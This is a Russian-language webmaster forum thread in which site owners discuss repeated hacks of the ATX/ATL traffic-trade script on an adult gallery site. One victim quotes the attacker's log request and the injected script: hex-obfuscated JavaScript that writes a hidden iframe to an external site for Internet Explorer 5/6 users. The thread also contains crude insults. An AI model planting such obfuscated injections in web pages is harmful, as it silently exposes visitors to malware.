Новая тема   Ответить

 Crow
Опять седня поломали долбаный атх, и опять вот это падло 92.62.101.9 , слух ты баран прекрати блять морочить голову людям или тебе по албански написать?
Прокляну суку навечно
АТХ сакс,уже ухожу,Смарт кстати тоже сакс
пысы:писалось в надежде , что эта блять таки прочитает

 Hawkins
кстати у тебя форма открыта была или как?

 Crow
нет конечно, причем уже очень давно, плюс была установлена защита рекомендованная на этом форуме

 Project
А все ли варианты защиты были применены?
Как подломали? Снова на морде js код?
Раскрой ситуацию поподробнее?

P.S. Вот не надоело вам на этом дерьме сижи водить...

 color
версия самая последняя стояла?

 Crow
да, версия последняя, ломали вот так: из отчета хостера(он же и чистил и устанавливал все защиты рекомендованные в том топике)
ломали такими запросами
92.62.101.9 - - [05/Jun/2008:14:40:02 +0000] "POST /galls/rough579/images/images.php HTTP/1.0" 200 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

в файлах был ява скрипт

<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E646675636B696E672D617369616E732E636F6
D2F696D616765732F7A2F7374617469632E7068703F7369673D333233323331323833413346334532303232323632433338323132322220
6865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=
''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.appVersio
n; if (v.indexOf('MSIE 6.0') != -1){document.write(unescape(o));}if (v.indexOf('MSIE 5.') != -1){document.write
(unescape(o));}</script>

ну вставленый скрипт уже не нов, третий раз такое происходит

Project: Варианты все были, надоело, ищу ,,

 Sterx
таким уродам надо пальцы ломать

 supphosting.com
Файрволом надо банить эту айпишку. Атл как был дырявым, так и остался. (

 Project

Заипешься банить... этот (эти) мудак ип меняет...

Crow
Почитай тут, есть очень много требований к защите атл, чтобы на 99% обезопаситься:
Попытки залогинитьcя в АТЛ под user/pass
Ну вот и меня подломали...

P.S. Хотя... стоит ли защищаться, если все новые и новые варианты взлома находятся...

 Crow
так он еще падло кинул в папку с галерами трояна, спасибо Назапаму
The requested URL is infected with Trojan-Clicker.HTML.IFrame.lz virus
Project: согласен, чем латать дыры, лучше свалить

 Crow
Вроде все почистили и залатали,спасибо суппорту Адванседов !

 supphosting.com
Бан файрволом нормально помогает, за все время атаки были только с трех айпишек.

 Project

Ну значит скоро будет 4-й ип, потом 5-й.
Сидеть и ждать взлома чтобы побанить новый ип?
Имхо - странный выход из положения...

 lega_cobra
Crow писал:

Почему при первой же проблеме этот IP не улетел автоматически в firewall?

 Kitaa
Project писал:
+1 не выход не разу. Знать что есть дырки и спокойно ничего не делать.

 Crow
lega_cobra писал:
Не к тем людям обратился в самом начале, вроде все сделали почистили(после первого взлома), а потом оказалось что не все (когда уже ломанули во второй раз), все было прописано в хтаксесе, но как видим не помогает только это, сейчас уже зафаерволили, но как правильно сказали, до след Ипа.
ну и собственно вопрос, чтобы не создавать новую тему: хренодеровский скрипт, ваши впечатления, как альтернатива атх

 Project
Хренодер - офигенный скрипт. Впечатления только положительные!
Навороченный правда слишком, но если рубишь в тонких настройках - то этот скрипт для тебя.

 Crow
лады закроем тему ,читеры все таки, продолжить можно здесь XrenCJ

 bizz
а что стоит помимо атх ?

 Crow
везде атл и атх, ввиду массовости и простоты настроек, но ломают почему то именно одно гей мгп, то ли этот долбохакер в попу любит фью фью то ли хз